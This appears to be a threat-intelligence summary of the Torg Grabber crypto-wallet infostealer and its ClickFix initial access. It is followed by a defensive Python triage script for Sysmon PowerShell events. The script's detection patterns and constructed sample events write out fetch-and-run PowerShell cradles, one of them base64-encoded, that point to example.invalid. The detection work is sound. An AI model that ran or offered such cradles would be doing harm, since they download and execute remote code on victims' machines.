Torg Grabber Malware Targets 728 Crypto Wallets with Advanced Techniques

Severity: High (Score: 72.0)

Sources: Bleepingcomputer, Bitget

Summary

Torg Grabber is a newly identified infostealer that targets 728 cryptocurrency wallet browser extensions along with other applications, including password managers and communication tools. It gains initial access through the ClickFix social-engineering technique, in which the victim is coached into pasting a PowerShell command that runs the payload. Development has been rapid: 334 unique samples were compiled in just three months, which points to a Malware-as-a-Service operation with several customers. Stolen data is exfiltrated over HTTPS connections routed through Cloudflare and is encrypted with ChaCha20, so the content does not travel in plaintext. The malware collects credentials, cookies, and session tokens from the applications it targets. Gen Digital has linked Torg Grabber to multiple criminal actors, many of them associated with the Russian cybercrime ecosystem. Users of browser-based hot wallets such as MetaMask and Phantom are at particular risk, because a stolen session lets an attacker act on the wallet directly and move funds. Torg Grabber is still evolving, and its impact is expected to grow.

Key Points

  • Torg Grabber targets 728 cryptocurrency wallet extensions and a range of other applications.
  • Initial access relies on ClickFix; the payload is executed by a PowerShell command.
  • Gen Digital identified 334 unique samples in three months, indicating active development.
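The summary describes the intrusion chain as ClickFix followed by a PowerShell command, which is the one stage of Torg Grabber that lands in ordinary endpoint telemetry before any wallet data is touched. The following detection logic is an added example written for this page; it is not code from the page, from Gen Digital, or from the Torg Grabber report. It assumes process-creation events with Sysmon Event ID 1 field names (Image, ParentImage, CommandLine, User), and every sample event below is constructed for the demo. The specific PowerShell command used by Torg Grabber is not given on the page, so the logic keys on the generic ClickFix pattern: PowerShell launched from the user's shell (Win+R under explorer.exe, or a console) that immediately fetches and runs remote code, with or without an -EncodedCommand wrapper.

```python
"""Triage Windows process-creation telemetry for ClickFix-style PowerShell launches.

Added example; not code from the page, Gen Digital, or the Torg Grabber report.
Assumptions: events use Sysmon Event ID 1 field names (Image, ParentImage,
CommandLine, User); SAMPLE_EVENTS below are constructed, not real logs.
"""
import base64
import binascii
import re

POWERSHELL_IMAGES = ("powershell.exe", "pwsh.exe")
# ClickFix victims paste the command into Win+R (child of explorer.exe) or a console.
USER_SHELL_PARENTS = ("explorer.exe", "cmd.exe", "windowsterminal.exe", "openconsole.exe")

# Download-and-execute cradles commonly used to fetch a stager.
DOWNLOAD_CRADLE = re.compile(
    r"(?i)(invoke-expression|\biex\b|downloadstring|downloadfile|invoke-webrequest|"
    r"\biwr\b|invoke-restmethod|\birm\b|frombase64string|start-bitstransfer|\bcurl\b)"
)
# Flags that hide the window or disable the profile / execution policy.
STEALTH_FLAGS = re.compile(
    r"(?i)(-w(?:indowstyle)?\s+hidden|-nop(?:rofile)?\b|-e(?:p|xecutionpolicy)\s+bypass|-noni(?:nteractive)?\b)"
)
# powershell.exe accepts prefixes of -EncodedCommand (-e, -ec, -enc, ...); the payload is UTF-16LE base64.
ENCODED_ARG = re.compile(r"(?i)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})")


def decode_encoded_command(command_line):
    """Return the decoded -EncodedCommand payload, or '' if absent or malformed."""
    m = ENCODED_ARG.search(command_line)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le", errors="replace")
    except (binascii.Error, ValueError):
        return ""


def triage(event):
    """Score one event; returns None when it is not a PowerShell launch."""
    if not event["Image"].lower().endswith(POWERSHELL_IMAGES):
        return None
    cmd = event["CommandLine"]
    decoded = decode_encoded_command(cmd)
    searchable = cmd + "\n" + decoded  # scan both the raw and the decoded text
    reasons = []
    if event["ParentImage"].lower().endswith(USER_SHELL_PARENTS):
        reasons.append("parent is a user shell (Win+R / console)")
    if decoded:
        reasons.append("encoded command")
    if STEALTH_FLAGS.search(cmd):
        reasons.append("stealth flags")
    if DOWNLOAD_CRADLE.search(searchable):
        reasons.append("download cradle")
    # ClickFix signature: a user-driven launch that immediately pulls remote code.
    is_candidate = ("parent is a user shell (Win+R / console)" in reasons
                    and "download cradle" in reasons)
    return {"user": event["User"], "reasons": reasons,
            "decoded": decoded, "clickfix_candidate": is_candidate}


def clickfix_candidates(events):
    """Return the triage records flagged as ClickFix candidates, in input order."""
    return [r for r in map(triage, events) if r and r["clickfix_candidate"]]


# --- constructed sample telemetry (not real logs) ---------------------------
_PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
_ENCODED = base64.b64encode(
    "iex (New-Object Net.WebClient).DownloadString('https://example.invalid/p')".encode("utf-16le")
).decode()
SAMPLE_EVENTS = [
    # 1: classic ClickFix paste: hidden window, policy bypass, fetch-and-run
    {"Image": _PS, "ParentImage": r"C:\Windows\explorer.exe", "User": r"CORP\alice",
     "CommandLine": 'powershell.exe -w hidden -nop -ep bypass -c "iex (iwr https://example.invalid/c)"'},
    # 2: same intent, cradle hidden behind -enc
    {"Image": _PS, "ParentImage": r"C:\Windows\explorer.exe", "User": r"CORP\bob",
     "CommandLine": "powershell -enc " + _ENCODED},
    # 3: scheduled admin script launched by a service host, no cradle
    {"Image": _PS, "ParentImage": r"C:\Windows\System32\svchost.exe", "User": "NT AUTHORITY\\SYSTEM",
     "CommandLine": "powershell.exe -NoProfile -File C:\\scripts\\inventory.ps1"},
    # 4: a user simply opening an interactive shell
    {"Image": _PS, "ParentImage": r"C:\Program Files\WindowsApps\WindowsTerminal.exe",
     "User": r"CORP\carol", "CommandLine": "powershell.exe"},
    # 5: not PowerShell at all
    {"Image": r"C:\Windows\System32\notepad.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "User": r"CORP\alice", "CommandLine": "notepad.exe notes.txt"},
]

if __name__ == "__main__":
    for hit in clickfix_candidates(SAMPLE_EVENTS):
        print(hit["user"], hit["reasons"], hit["decoded"][:60])
```

Only the two pasted launches are flagged: the service-launched script trips the `-NoProfile` stealth check but has no user-shell parent and no cradle, and the interactive shell has a user-shell parent but no cradle. When a hit comes from explorer.exe, the pasted text can usually be corroborated on the host in the Run dialog history under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, which records what the user typed into Win+R.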

Key Entities

  • Malware (attack_type)
  • RedLine (malware)
  • Torg Grabber (malware)
  • Vidar (malware)
  • VoidStealer (malware)
  • T1041 - Exfiltration Over C2 Channel (mitre_attack)
  • T1055 - Process Injection (mitre_attack)
  • T1059.001 - PowerShell (mitre_attack)
  • T1070.001 - Clear Windows Event Logs (mitre_attack)
  • T1567 - Exfiltration Over Web Service (mitre_attack)
  • Brave (platform)
  • Discord (platform)
  • Edge (platform)
  • Firefox (platform)
  • MetaMask (platform)
  • Chrome (tool)
  • PowerShell (tool)
  • Underground (tool)
  • Cloudflare (company)